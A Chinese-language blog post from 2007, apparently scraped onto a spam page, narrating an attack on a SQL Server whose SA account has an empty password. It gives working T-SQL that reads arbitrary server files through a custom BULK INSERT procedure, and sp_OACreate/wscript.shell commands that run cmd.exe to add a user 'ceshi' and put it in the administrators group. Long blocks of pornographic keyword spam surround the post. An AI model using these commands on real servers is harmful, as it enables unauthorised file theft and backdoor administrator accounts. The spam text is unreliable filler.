国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

SQL Server SA空口令的滲透測試日記
2007-10-19   

前幾天朋友找我,讓我幫忙測試一下他們的服務器,經過掃描后發現SQLServer的SA為空,決定利用這個漏洞做滲透測試。經過測試發現存儲過程Xp_cmdshell以及讀取注冊表系列的存儲過程都被刪除了,并且Xplog70.dll也被刪除,所以無法執行CMD命令和克隆管理員帳號了,看樣子是經過安全配置的,這種情況據我當時掌握的知識是沒辦法入侵的。以前也遇到過類似的機器,所以決定利用幾天的時間解決這個問題。

經過兩天的查閱資料和測試,實現了不需要使用任何SQLServer自帶的存儲過程就可以從目標機上得到txt、asp等類型文件的內容(前提是知道SA密碼或者SA密碼為空),實現過程就是自己建立一個臨時表,然后將文件讀到表中,再用SELECT語句得到返回值,即文件的內容。我們可以在查詢分析器里先寫入一個存儲過程,然后執行,在需要的時候只要調用該存儲過程即可:

Create proc sp_readTextFile @filename sysname
as

    begin 
    set nocount on 
    Create table #tempfile (line varchar(8000))
    exec ('bulk insert #tempfile from "' + @filename + '"')
    select * from #tempfile
    drop table #tempfile
End
go

這樣我們只要執行類似下面的語句就可以得到指定路徑下文件的內容:

exec sp_readTextFile 'c:\aaa.asp'

實現這個功能后,本打算通過讀取朋友服務器上網站的asp代碼,做進一步的入侵,可是后來發現,因為不知道網站asp文件的絕對路徑,所以這個功能根本用不上,只好作罷,另找其他方法。在這之后的幾天時間里,我想到了使用安全文章經常提到OLE相關的一系列存儲過程,這一系列的存儲過程同Xp_cmdshell以及讀取注冊表系列的存儲過程一樣危險,但是其使用方法不象那些存儲過程在網絡上和書上介紹的那樣多,這系列的存儲過程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop,下面我講一下通過查閱資料得到的使用方法:

打開查詢分析器,然后使用SA與目標機連接上,在查詢分析器里執行:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user
ceshi 1 /add'--

這樣對方系統增加了一個用戶名為ceshi,密碼為1的用戶,再執行:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup
administrators ceshi /add '--

用戶ceshi,被加入管理員組。

總結:通過這次滲透測試,又學到了一種利用存儲過程控制SA為空的SQLServer服務器的方法。


熱詞搜索:

上一篇:Microsoft SQL Server SA弱口令攻防實戰
下一篇:犯罪分子日益狡猾 Web 2.0世界潛藏更大隱私危機

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美综合亚洲图片综合区| 亚洲一区成人在线| 日韩女优av电影在线观看| 亚洲精品视频一区| 久久99精品国产91久久来源| 欧美午夜不卡在线观看免费| 亚洲免费观看在线观看| 国产一区二区三区香蕉| 日韩欧美自拍偷拍| 久久99久久精品| 日韩免费一区二区| 日本强好片久久久久久aaa| 欧美精品欧美精品系列| 亚洲午夜久久久久久久久电影院 | 国产黑丝在线一区二区三区| 日韩欧美久久久| 久久精品国产精品亚洲综合| 欧美不卡一区二区三区四区| 国产精品66部| 欧美激情中文不卡| caoporn国产精品| 亚洲欧美激情一区二区| 91尤物视频在线观看| 亚洲精品老司机| 欧美性极品少妇| 天天色天天操综合| 精品国产1区2区3区| 成人污视频在线观看| 伊人夜夜躁av伊人久久| 精品视频1区2区3区| 免费看日韩a级影片| 久久色在线观看| 91免费观看在线| 视频精品一区二区| 久久先锋影音av鲁色资源网| 91麻豆视频网站| 日韩和欧美一区二区三区| 久久色中文字幕| 色婷婷av一区二区三区大白胸 | 在线播放中文字幕一区| 久久精品久久精品| 综合久久给合久久狠狠狠97色 | 一区二区三区中文字幕在线观看| 欧美丝袜自拍制服另类| 国精品**一区二区三区在线蜜桃| 国产精品九色蝌蚪自拍| 欧美精品777| 高清日韩电视剧大全免费| 亚洲成年人网站在线观看| 久久一日本道色综合| 欧美亚一区二区| 精品制服美女久久| 亚洲一区在线免费观看| 久久这里只有精品视频网| 91毛片在线观看| 国产在线视频一区二区| 亚洲高清免费一级二级三级| 中文字幕久久午夜不卡| 5566中文字幕一区二区电影| 91欧美激情一区二区三区成人| 久久99国产精品久久99果冻传媒| 亚洲综合男人的天堂| 久久久久久夜精品精品免费| 欧美无人高清视频在线观看| 成人免费毛片片v| 国精产品一区一区三区mba桃花| 亚洲另类一区二区| 国产精品色眯眯| 26uuu另类欧美亚洲曰本| 欧美一区国产二区| 9191久久久久久久久久久| 色88888久久久久久影院野外| 成人一区二区三区在线观看| 国产综合成人久久大片91| 免费看欧美女人艹b| 亚洲3atv精品一区二区三区| 亚洲老司机在线| 亚洲欧美在线aaa| 国产欧美日韩在线| 国产亚洲精品bt天堂精选| 精品久久国产老人久久综合| 8x8x8国产精品| 538在线一区二区精品国产| 欧美色欧美亚洲另类二区| 91老师片黄在线观看| 99re这里都是精品| 99精品视频在线免费观看| 成人福利在线看| eeuss影院一区二区三区| 不卡的看片网站| zzijzzij亚洲日本少妇熟睡| www.亚洲免费av| 91免费版在线看| 91福利视频在线| 欧美视频一二三区| 在线播放中文一区| 精品福利一二区| 国产精品乱码妇女bbbb| 亚洲欧美色综合| 亚洲国产sm捆绑调教视频| 日韩有码一区二区三区| 蜜桃久久久久久| 国产成人午夜精品影院观看视频| 成人手机在线视频| 色婷婷激情久久| 欧美日韩成人综合在线一区二区| 日韩免费观看高清完整版| 久久精品一区八戒影视| 最近日韩中文字幕| 日韩av成人高清| 国产精品1区2区3区在线观看| 成人高清视频免费观看| 欧美天堂亚洲电影院在线播放| 538prom精品视频线放| 久久久久99精品国产片| 亚洲自拍欧美精品| 经典一区二区三区| 色94色欧美sute亚洲13| 精品国一区二区三区| 亚洲丝袜美腿综合| 精品系列免费在线观看| 99精品视频一区二区| 欧美一级生活片| 亚洲视频一区二区免费在线观看| 性久久久久久久久| 成人av在线一区二区三区| 91精品国产综合久久久久久漫画| 国产亚洲综合在线| 五月天激情综合网| 99re热这里只有精品免费视频 | 国产一区二区福利| 精品视频在线视频| 欧美国产日韩在线观看| 蜜臀久久99精品久久久画质超高清| 成人一级片网址| 91精品在线一区二区| 国产精品系列在线| 久久爱另类一区二区小说| 91福利资源站| 国产精品久久久久影院| 国产精品自产自拍| 日韩无一区二区| 亚洲影视在线播放| 91一区二区在线观看| 国产丝袜欧美中文另类| 精品亚洲欧美一区| 日韩欧美电影在线| 日本一区中文字幕| 欧美美女一区二区在线观看| 一区二区三区蜜桃| 色婷婷综合久久久中文一区二区| 欧美国产日韩a欧美在线观看 | 欧美成人官网二区| 免费观看30秒视频久久| 欧美老女人在线| 午夜视频一区二区三区| 在线欧美小视频| 亚洲免费看黄网站| 一本在线高清不卡dvd| 国产精品二三区| 成人av影视在线观看| 中文字幕第一区二区| 国产mv日韩mv欧美| 中文字幕制服丝袜一区二区三区| 国产·精品毛片| 中文字幕在线观看一区二区| 成人免费不卡视频| 亚洲欧美日韩中文字幕一区二区三区| 成人性生交大合| 亚洲视频一区在线| 欧美天堂一区二区三区| 天天影视网天天综合色在线播放| 欧美老肥妇做.爰bbww视频| 日韩av中文在线观看| 欧美一级xxx| 国产一区高清在线| 中文字幕五月欧美| 欧美艳星brazzers| 日韩不卡一区二区| 久久亚洲精品小早川怜子| 国产精品一区二区在线播放| 中文字幕一区二区日韩精品绯色| 91国内精品野花午夜精品| 日本欧美一区二区| 国产欧美日韩精品一区| 欧洲国内综合视频| 日本欧美在线看| 欧美激情中文字幕| 欧美在线观看视频一区二区三区 | 欧美日本在线播放| 国产乱一区二区| 亚洲免费伊人电影| 日韩西西人体444www| 成人手机在线视频| 午夜精品福利在线| 欧美韩国日本综合| 欧美老肥妇做.爰bbww视频| 国产.欧美.日韩| 奇米色777欧美一区二区| 国产欧美精品日韩区二区麻豆天美|